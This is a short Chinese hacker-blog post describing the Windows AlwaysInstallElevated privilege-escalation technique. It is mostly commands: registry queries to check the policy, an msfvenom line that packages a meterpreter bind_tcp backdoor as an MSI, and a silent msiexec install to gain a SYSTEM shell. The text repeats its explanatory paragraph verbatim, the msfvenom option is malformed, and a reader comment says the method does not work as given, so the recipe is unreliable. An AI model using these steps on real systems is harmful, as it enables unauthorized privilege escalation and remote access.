Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
lsh4ckLsh4ck  2019-06-20 18:57 lsh4ck's Blog 隐藏边栏 |   2 条评论  545 
文章评分 1 次,平均分 5.0

Windows环境提供组策略设置,允许常规用户安装具有系统权限的Microsoft Windows Installer程序包(MSI)。这可以在标准用户想要安装需要系统权限的应用程序的环境中发 现,并且管理员希望避免向用户提供临时本地管理员访问权限。Windows环境提供组策略设置,允许常规用户安装具有系统权限的Microsoft Windows Installer程序包(MSI)。这可以在标准用户想要安装需要系统权限的应用程序的环境中发 现,并且管理员希望避免向用户提供临时本地管理员访问权限。



reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

生成msi

msfvenom -p windows/meterpreter/bind_tcp lport4567 -f msi > /root/Desktop/1.msi

系统shell下执行命令,可以获取systemshell

msiexec /quiet /qn /i 1.msi



本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

lsh4ck
Lsh4ck 关注:0    粉丝:8
这个人很懒,什么都没写
×

予人玫瑰,手有余香

打赏 Lsh4ck

打开支付宝扫一扫,即可进行扫码打赏哦

发表评论

表情 格式 链接 私密 签到

  1. 111
    111 中国 Chrome 65.0.3325.181 Windows 10 x64 Edition

    msf的不行 权限令牌为中等 需要msi wrapper来制作

扫一扫二维码分享

无觅相关文章插件,快速提升流量